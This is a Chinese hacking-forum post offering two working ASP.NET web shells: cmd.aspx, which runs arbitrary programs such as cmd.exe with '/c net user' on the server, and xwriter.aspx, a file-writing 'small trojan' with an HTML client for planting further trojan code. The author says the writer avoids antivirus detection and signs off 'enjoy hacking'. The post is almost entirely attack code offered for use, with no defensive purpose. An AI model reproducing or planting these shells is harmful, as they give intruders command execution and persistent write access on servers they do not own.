两个有用的ASP.Net小程序

　　一、cmd.aspx

　　在邪恶八进制论坛（ps：有谁知道为什么最近几天这论坛打不开啊）有朋友提出webadmin执行命令不能带参数的问题，偶找了个bt主机来试试，果然有问题，就把以前那个cmd.aspx改了改，就请凑合着用先。webadmin 2.x的下个版本将修复这个问题．

　　把一下代码复制保存为一.aspx文件即可：

<%@ page language="vb" debug="true" %><%@ import namespace="system.io" %><%@ import namespace="system.diagnostics" %><script runat="server"> 

     sub runcmd(src as object, e as eventargs)

            dim myprocess as new process() 

           dim myprocessstartinfo as new processstartinfo(xpath.text)            myprocessstartinfo.useshellexecute = false            myprocessstartinfo.redirectstandardoutput = true 

           myprocess.startinfo = myprocessstartinfo  

          myprocessstartinfo.arguments=xcmd.text 

           myprocess.start() 

           dim mystreamreader as streamreader = myprocess.standardoutput

            dim mystring as string = mystreamreader.readtoend()

            myprocess.close()

            mystring=replace(mystring,"<","&lt;")

            mystring=replace(mystring,">","&gt;")

            result.text= vbcrlf & "<pre>" & mystring & "</pre>"

    end sub

</script>

<html>

<head>

    <title>asp.net shell for webadmin2.x final</title>

    <meta http-equiv="content-type" content="text/html; charset=gb2312" />

</head>

<body>

    <form runat="server">

        <asp:label id="l_p" runat="server" width="80px">program</asp:label>

        <asp:textbox id="xpath" runat="server" width="300px">c:/windows/system32/cmd.exe</asp:textbox> 

       <br />

        <asp:label id="l_a" runat="server" width="80px">arguments</asp:label> 

       <asp:textbox id="xcmd" runat="server" width="300px" text="/c net user">/c net user</asp:textbox>

        <br />

        <asp:button id="button" runat="server" width="100px" text="run"></asp:button>

        <p>

            <asp:label id="result" runat="server"></asp:label> 

       </p> 

   </form>

</body>

</html>

　　二、xwriter.aspx

　　记得有个asp下的小马就是利用fso把提交的文本信息保存为一个文件，虽然体积比eval大些但是代码完全合法，杀毒软件也不会找茬的。呵呵，以下代码就是在asp.net实现这功能（自己拿去改改还可以插入aspx文件哦）：

 <%@ page language="vb" %>

<%@ import namespace="system.io" %>

<script runat="server">

sub page_load(sender as object, e as eventargs)

    dim mywrite as new streamwriter(request.form("path"), true, encoding.default)    mywrite.write(request.form("content"))

    mywrite.close

    response.write("done!")end sub

</script>

以下是客户端，复制下来保存为htm文件：

 <!doctype html public "-//w3c//dtd html 4.01 transitional//en""http://www.w3.org/tr/html4/loose.dtd">

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=gb2312">

<title>xwriter.net by lake2</title>

</head>

<body>

<form name="form1" method="post" onsubmit="twosubmit(this);">

<div align="center">url:

  <input name="url" type="text" value="http://www.xxx.com/a.aspx" size="60">

  <br>

  path:

  <input name="path" type="text" id="path" value="e:/myweb/myown/a.txt" size="60">

  <br>

  <textarea name=content cols=120 rows=10 id="content" width=45>填入生成木马的内容，最好是全英文</textarea>

  <br>

  <center>

  <br>

  <input type=submit value=提交>

  <br>

  enjoy hacking !!!!!! </div>

</body></html>

<script language="javascript">

function twosubmit(form1){

var url = document.form1.url.value;

form1.action=url;

form1.submit();

}

</script>